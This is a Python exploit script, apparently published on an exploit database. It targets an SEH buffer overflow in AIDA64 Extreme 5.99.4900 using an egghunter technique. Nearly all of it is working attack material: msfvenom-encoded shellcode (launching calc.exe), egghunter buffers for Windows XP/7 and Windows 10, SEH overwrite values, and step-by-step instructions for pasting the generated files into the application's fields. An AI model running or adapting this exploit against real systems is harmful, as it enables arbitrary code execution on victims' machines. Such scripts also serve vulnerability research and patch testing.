#!/usr/bin/python
#
# Exploit Title: AIDA64 Extreme 5.99.4900 - SEH Buffer Overflow (EggHunter)
#
# Date: 2019-04-01
#
# Vendor Homepage: https://www.aida64.com
#
# Software Link: http://download.aida64.com/aida64extreme599.exe
#
# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe
#
# Exploit Author: Peyman Forouzan
#
# Tested Version: 5.99.4900
#
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit
#
# Special Thanks to my wife
#
# The program has an SEH Buffer Overflow in several places (this code shows one of them).
#
# Note 1 : To optimize the code, I've used a "stack pivot" that is the same in the
# (Extreme, Engineer, Network Audit) Editions.
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900,
# but the stack pivots in the Business Edition are different.
#
# Note 2 : All the old versions of the program that are available on sites like soft32.com,
# or in https://www.aida64.com/downloads/archive,
# have the same vulnerability at different offsets (for example version 5.70.3800).
#
# Note 3 : This technique (EggHunter) has been used to trigger the vulnerability on different Windows versions.
#
# Steps :
# 1- Run the python code : Aida64-Extreme.py (three files are created)
# 2- App --> File --> Preferences --> Email --> SMTP --> paste the contents of egg.txt
#    into "Display name" --> Ok
# 3- Report --> Report Wizard ... --> Next --> paste the contents of egghunter-winxp-win7.txt
#    or egghunter-win10.txt (depending on your Windows version) into "Load from file" --> Next
#    --> Wait a minute --> Shellcode (Calc) opens
#
#---------------------------------------------------------------------------------------------------------
#
#------------------------------------ EGG Shellcode Generation---------------------------------------

bufsize = 292

# msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open("egg.txt", "w")
f.write(egg)
f.close()

#---------------------------------- EGG Hunter Shellcode Generation------------------------------------

# Egg hunter for Windows XP / Windows 7
egghunter = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"

# Egg hunter for Windows 10
egghunter10 = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"
egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"
egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"
egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"
egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"
egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"
egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"
egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"
egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"
egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"
egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"
egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"
egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"
egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"
egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"

jmpback = "\xe9\xdc\xfe\xff\xff"  # jmp back
nseh = "\xeb\xf9\x90\x90"          # jmp short back
seh = "\x40\x15\x40"               # Overwrite SEH - Golden Pivot !!

# Payload for Windows XP / Windows 7
buffer = egghunter
buffer += "\x41" * (bufsize - len(buffer) - len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh

print "[+] Creating %s bytes payload for winxp and windows 7 ..." % len(buffer)
f = open("egghunter-winxp-win7.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()

# Payload for Windows 10
buffer = egghunter10
buffer += "\x41" * (bufsize - len(buffer) - len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh

print "[+] Creating %s bytes payload for windows 10 ..." % len(buffer)
f = open("egghunter-win10.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()